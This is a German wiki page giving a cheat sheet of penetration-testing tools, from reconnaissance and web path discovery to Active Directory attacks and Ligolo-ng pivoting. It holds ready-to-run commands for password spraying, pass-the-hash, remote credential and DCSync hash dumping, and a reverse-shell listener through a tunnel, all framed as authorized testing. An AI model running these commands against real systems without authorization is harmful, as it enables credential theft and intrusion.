Thomas.will: Die Seite wurde neu angelegt: „= Pentest Tools Übersicht = Übersicht über gängige Werkzeuge für professionelle Penetrationstests. Alle Aktivitäten setzen einen schriftlichen Auftrag (…“

2026-06-01T15:40:34Z

Die Seite wurde neu angelegt: „= Pentest Tools Übersicht = Übersicht über gängige Werkzeuge für professionelle Penetrationstests. Alle Aktivitäten setzen einen schriftlichen Auftrag (…“

Neue Seite

= Pentest Tools Übersicht =

Übersicht über gängige Werkzeuge für professionelle Penetrationstests. Alle Aktivitäten setzen einen schriftlichen Auftrag (Rules of Engagement) voraus.

__TOC__

== Voraussetzungen ==

* Kali Linux oder Parrot OS (alle Tools im Repo)
* Schriftlicher Pentest-Auftrag / ROE
* Definierter Scope

<syntaxhighlight lang="bash">
# Tool-Installation (falls nicht vorhanden)
sudo apt update && sudo apt install -y rustscan feroxbuster dirsearch whatweb netexec bloodhound-python impacket gowitness
pip install cloud-enum --break-system-packages
</syntaxhighlight>

----

== Reconnaissance ==

=== RustScan (Ultra Fast Port Scanner) ===

Moderner Hochgeschwindigkeits-Portscanner. Deutlich schneller als nmap alleine — scannt alle Ports vor und übergibt Treffer an nmap zur Analyse.

; Installation
: In Kali enthalten, alternativ: <code>cargo install rustscan</code>

<syntaxhighlight lang="bash">
# Basis-Scan
rustscan -a target.com

# Bestimmte Ports
rustscan -a target.com -p 22,80,443

# Alle Ports (1-65535)
rustscan -a target.com -r 1-65535

# Subnetz
rustscan -a 192.168.1.0/24

# Scan-Geschwindigkeit erhöhen (ulimit)
rustscan -a target.com --ulimit 5000

# Direkt an nmap übergeben (Service-Detection)
rustscan -a target.com -- -sV

# Ergebnisse speichern
rustscan -a target.com > rustscan_results.txt

# Timeout anpassen (ms)
rustscan -a target.com -t 2000
</syntaxhighlight>

; Hinweis
: <code>--ulimit</code> erhöht die Anzahl gleichzeitiger Verbindungen. Vorsicht auf instabilen Zielen — ggf. reduzieren.

----

=== WhatWeb (Web Technology Fingerprinting) ===

Identifiziert eingesetzte Technologien auf Webservern: CMS, Frameworks, Plugins, Softwareversionen. Nützlich zur Angriffsvektoranalyse.

<syntaxhighlight lang="bash">
# Basis-Scan
whatweb https://target.com

# Mehrere Ziele aus Datei
whatweb -i targets.txt

# Verbose-Output
whatweb -v https://target.com

# Aggressiver Scan (Stufe 1-4, Standard ist 1)
whatweb -a 3 https://target.com

# Ausgabe in Datei
whatweb https://target.com -o report.txt

# Gezielt nach Plugin suchen
whatweb --plugins wordpress https://target.com

# Subnetz scannen
whatweb 192.168.1.0/24

# Hilfe
whatweb --help
</syntaxhighlight>

; Aggressionsstufen
: 1 = passiv (Standard), 3 = aktiv mit mehr Requests, 4 = sehr aggressiv

----

=== Gowitness (Web Screenshot Recon) ===

Erstellt automatisch Screenshots von Weboberflächen. Praktisch bei großen Scopes um Login-Panels, Dashboards und exponierte Interfaces schnell zu identifizieren.

<syntaxhighlight lang="bash">
# Einzelner Host
gowitness single https://target.com

# Mehrere Hosts aus Datei
gowitness file -f targets.txt

# Screenshots in Verzeichnis speichern
gowitness file -f targets.txt -P screenshots/

# Mit Timeout (Sekunden)
gowitness single https://target.com --timeout 10

# HTTP und HTTPS erfassen
gowitness file -f targets.txt --disable-tls

# Auflösung setzen
gowitness single https://target.com --resolution-x 1920 --resolution-y 1080

# Datenbank speichern
gowitness file -f targets.txt --db-path gowitness.db

# HTML-Report generieren
gowitness report generate
</syntaxhighlight>

----

=== Cloud_enum (Cloud Asset Discovery) ===

Findet exponierte Cloud-Ressourcen bei AWS, Azure und Google Cloud — öffentlich erreichbare Storage-Buckets, Services und Infrastruktur.

<syntaxhighlight lang="bash">
# Basis-Enumeration
cloud_enum -k target

# Nur AWS
cloud_enum -k target --cloud aws

# Nur Azure
cloud_enum -k target --cloud azure

# Ausgabe in Datei
cloud_enum -k target -o results.txt

# Mehrere Keywords aus Datei
cloud_enum -kf keywords.txt

# Verbose
cloud_enum -k target -v

# Mit Threading
cloud_enum -k target -t 10

# JSON-Output
cloud_enum -k target -o results.json -j
</syntaxhighlight>

; Hinweis
: Als Keyword eignen sich Firmenname, Produktnamen, Subdomains — alles was als Bucket-Name auftauchen könnte.

----

== Web Application Testing ==

=== Dirsearch (Web Path Discovery) ===

Findet versteckte Verzeichnisse und Dateien auf Webservern: Admin-Panels, Backup-Dateien, exponierte Endpoints.

<syntaxhighlight lang="bash">
# Basis-Scan
dirsearch -u https://target.com

# Eigene Wordlist
dirsearch -u https://target.com -w wordlist.txt

# Bestimmte Extensions
dirsearch -u https://target.com -e php,html,txt

# Mehrere Ziele
dirsearch -l targets.txt

# Ausgabe speichern
dirsearch -u https://target.com -o results.txt

# Thread-Anzahl
dirsearch -u https://target.com -t 50

# Rekursiver Scan
dirsearch -u https://target.com -r

# Silent Mode (nur Treffer)
dirsearch -u https://target.com -q
</syntaxhighlight>

----

=== Feroxbuster (Fast Content Discovery) ===

Schnelle Alternative zu dirsearch, in Rust geschrieben. Gut für große Wordlists und rekursive Scans.

<syntaxhighlight lang="bash">
# Basis-Scan
feroxbuster -u https://target.com -w wordlist.txt

# Rekursiv
feroxbuster -u https://target.com -w wordlist.txt -r

# Mit File-Extensions
feroxbuster -u https://target.com -w wordlist.txt -x php,html,txt

# Ausgabe speichern
feroxbuster -u https://target.com -w wordlist.txt -o results.txt

# Rate Limiting
feroxbuster -u https://target.com -w wordlist.txt --rate-limit 50

# Thread-Anzahl
feroxbuster -u https://target.com -w wordlist.txt -t 50

# Keine Rekursion
feroxbuster -u https://target.com -w wordlist.txt -n

# Silent Mode
feroxbuster -u https://target.com -w wordlist.txt -q
</syntaxhighlight>

; Wordlists
: <code>/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</code> ist ein guter Startpunkt.

----

== Internal Network / Active Directory ==

=== NetExec (Network Exploitation Tool) ===

Moderner Nachfolger von CrackMapExec. Analysiert SMB, WinRM, SSH und weitere Dienste. Zentral für interne Netzwerktests und Active Directory Enumeration.

<syntaxhighlight lang="bash">
# SMB-Dienst scannen
netexec smb target.com

# Subnetz scannen
netexec smb 192.168.1.0/24

# Benutzer enumerieren (Guest-Login)
netexec smb target.com -u guest -p ""

# Mit Credentials authentifizieren
netexec smb target.com -u admin -p password

# Befehl ausführen
netexec smb target.com -u admin -p password -x whoami

# WinRM prüfen
netexec winrm target.com

# SSH prüfen
netexec ssh target.com

# Shares auflisten
netexec smb target.com --shares

# Passwort-Spray (Vorsicht: Lockout-Policy beachten!)
netexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!'

# Hash-Authentication (Pass-the-Hash)
netexec smb target.com -u admin -H NTLMHASH
</syntaxhighlight>

; Wichtig
: Vor Passwort-Spray immer Lockout-Policy prüfen. Im Zweifel: lieber nicht.

----

=== BloodHound (Active Directory Enumeration) ===

Sammelt AD-Informationen und visualisiert Beziehungen zwischen Benutzern, Systemen und Berechtigungen. Zeigt Privilege-Escalation-Pfade im Graphen.

<syntaxhighlight lang="bash">
# Alle Daten sammeln
bloodhound-python -d domain.local -u user -p password -c all

# Nur Session-Daten
bloodhound-python -d domain.local -u user -p password -c session

# Mit eigenem DNS-Server
bloodhound-python -d domain.local -u user -p password -ns 192.168.1.10

# Ausgabe in Verzeichnis
bloodhound-python -d domain.local -u user -p password -c all -o output/

# Hash-Authentifizierung
bloodhound-python -d domain.local -u user --hashes LM:NT

# Nur Gruppen
bloodhound-python -d domain.local -u user -p password -c group

# Nur Computer
bloodhound-python -d domain.local -u user -p password -c computer

# LDAPS verwenden
bloodhound-python -d domain.local -u user -p password --use-ldaps
</syntaxhighlight>

; Workflow
: 1. bloodhound-python → JSON-Dateien generieren
: 2. Neo4j starten: <code>sudo neo4j start</code>
: 3. BloodHound GUI starten, JSON-Dateien importieren
: 4. Vordefinierte Queries nutzen: "Shortest Paths to Domain Admin"

----

=== Impacket-secretsdump (Credential Extraction) ===

Extrahiert Credentials, Passwort-Hashes und Authentifizierungsdaten aus Windows-Systemen. Für AD-Assessments und Credential-Exposure-Analyse.

<syntaxhighlight lang="bash">
# Remote Credential Dump
impacket-secretsdump user:password@target.com

# NTLM-Authentifizierung mit Domain
impacket-secretsdump domain/user:password@target.com

# Per IP-Adresse
impacket-secretsdump user:password@192.168.1.10

# Ausgabe in Datei
impacket-secretsdump user:password@target.com > hashes.txt

# Hash-Authentifizierung (Pass-the-Hash)
impacket-secretsdump -hashes LMHASH:NTHASH user@target.com

# Lokale SAM-Datenbank (offline, mit Registry-Hives)
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Domain Controller (DCSync)
impacket-secretsdump domain/user:password@dc.domain.local

# Debug-Mode
impacket-secretsdump -debug user:password@target.com
</syntaxhighlight>

; Hinweis DCSync
: Erfordert Replikationsrechte (Domain Admin oder delegiert). Zieht alle Hashes vom DC ohne direkten Zugriff auf NTDS.dit.

----

== Pivoting und Tunneling ==

=== Ligolo-ng (Advanced Pivoting Tool) ===

Modernes Pivoting-Tool für interne Netzwerke. Erstellt eine transparente Netzwerkverbindung über einen kompromittierten Host — ohne SOCKS-Proxy, direkt über ein tun-Interface. Deutlich komfortabler als klassisches SSH-Tunneling oder Chisel.

==== Konzept ====

<syntaxhighlight lang="text">
Angreifer (Kali) ──[ligolo-proxy]──► Pivot-Host ──[ligolo-agent]──► internes Netz
(DMZ) (192.168.10.0/24)
</syntaxhighlight>

Der Proxy läuft auf dem Angreifer-System, der Agent auf dem kompromittierten Host. Nach dem Verbindungsaufbau routet Kali Traffic transparent ins interne Netz.

==== Lab-Setup ====

; Voraussetzung
: Zwei Netzsegmente in Proxmox/VirtualBox:
:* <code>vmbr1</code> — DMZ-Netz (z.B. 10.10.10.0/24), Kali und Pivot-Host
:* <code>vmbr2</code> — internes Netz (z.B. 192.168.10.0/24), nur Pivot-Host und Ziele

==== Schritt 1: Binaries herunterladen ====

<syntaxhighlight lang="bash">
# Auf Kali (Angreifer)
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_linux_amd64
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_agent_linux_amd64
chmod +x ligolo-ng_proxy_linux_amd64 ligolo-ng_agent_linux_amd64
mv ligolo-ng_proxy_linux_amd64 ligolo-proxy
mv ligolo-ng_agent_linux_amd64 ligolo-agent
</syntaxhighlight>

; Windows-Agent (für Windows-Pivot-Hosts)
: <code>ligolo-ng_agent_windows_amd64.exe</code> vom gleichen Release

==== Schritt 2: tun-Interface erstellen (Kali) ====

<syntaxhighlight lang="bash">
# Einmalig — tun-Interface anlegen
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
</syntaxhighlight>

==== Schritt 3: Proxy starten (Kali) ====

<syntaxhighlight lang="bash">
# Self-signed Cert (für Lab ausreichend)
./ligolo-proxy -selfcert

# Lauscht auf Port 11601 (default)
# Eigenes Zertifikat
./ligolo-proxy -certfile cert.pem -keyfile key.pem
</syntaxhighlight>

==== Schritt 4: Agent auf Pivot-Host starten ====

<syntaxhighlight lang="bash">
# Agent auf dem kompromittierten Host ausführen
# (Binary vorher übertragen per scp/wget/curl)
./ligolo-agent -connect KALI_IP:11601 -ignore-cert

# Windows
.\ligolo-agent.exe -connect KALI_IP:11601 -ignore-cert
</syntaxhighlight>

==== Schritt 5: Tunnel aufbauen (Proxy-Shell) ====

<syntaxhighlight lang="text">
# In der ligolo-proxy Shell:

ligolo-ng » session
# → verbundene Agents anzeigen, Nummer eingeben

ligolo-ng » ifconfig
# → Netzwerkinterfaces des Pivot-Hosts anzeigen
# → internes Netz identifizieren (z.B. 192.168.10.0/24)

ligolo-ng » tunnel_start
# → Tunnel aktiv
</syntaxhighlight>

==== Schritt 6: Route auf Kali setzen ====

<syntaxhighlight lang="bash">
# Internes Netz über ligolo-Interface routen
sudo ip route add 192.168.10.0/24 dev ligolo

# Prüfen
ip route show | grep ligolo
</syntaxhighlight>

==== Schritt 7: Internes Netz scannen ====

<syntaxhighlight lang="bash">
# Ab jetzt direkt aus Kali — kein Proxy-Chain nötig
nmap -sT -p 1-1000 192.168.10.0/24
rustscan -a 192.168.10.0/24
netexec smb 192.168.10.0/24
</syntaxhighlight>

==== Tunnel beenden ====

<syntaxhighlight lang="text">
ligolo-ng » tunnel_stop
ligolo-ng » exit
</syntaxhighlight>

<syntaxhighlight lang="bash">
# Route entfernen
sudo ip route del 192.168.10.0/24 dev ligolo
</syntaxhighlight>

==== Listener (Reverse Shells durch den Tunnel) ====

Wenn eine Reverse Shell aus dem internen Netz zu Kali zurückkommen soll:

<syntaxhighlight lang="text">
# In der Proxy-Shell einen Listener definieren
ligolo-ng » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

# Payload auf internem Ziel: Connect zu PIVOT_HOST:4444
# Ligolo leitet weiter zu Kali:4444
</syntaxhighlight>

<syntaxhighlight lang="bash">
# Kali: netcat lauscht
nc -lvnp 4444
</syntaxhighlight>

----

== Typischer Workflow ==

<syntaxhighlight lang="text">
1. Scope definieren, ROE unterschrieben

2. Recon extern
rustscan → offene Ports
whatweb → Technologie-Fingerprint
cloud_enum → Cloud-Assets

3. Web Application
dirsearch / feroxbuster → versteckte Pfade
gowitness → visuelle Übersicht bei vielen Hosts

4. Foothold
netexec smb → SMB-Enumeration, Shares
impacket-secretsdump → Credential Dump nach Zugriff

5. Internal
bloodhound-python → AD-Mapping
netexec → lateral movement

6. Pivoting (bei Segmentierung)
ligolo-ng → Tunnel ins interne Netz
→ Tools laufen dann direkt gegen interne Ziele
</syntaxhighlight>

----

== Siehe auch ==

* [[Kali Linux Grundlagen]]
* [[Nmap Cheatsheet]]
* [[Active Directory Angriffe]]
* [[Faraday SIEM Integration]]

[[Kategorie:Pentest]]
[[Kategorie:Tools]]
[[Kategorie:Kali Linux]]

Pentest Tools - Versionsgeschichte

Thomas.will: Die Seite wurde neu angelegt: „= Pentest Tools Übersicht = Übersicht über gängige Werkzeuge für professionelle Penetrationstests. Alle Aktivitäten setzen einen schriftlichen Auftrag (…“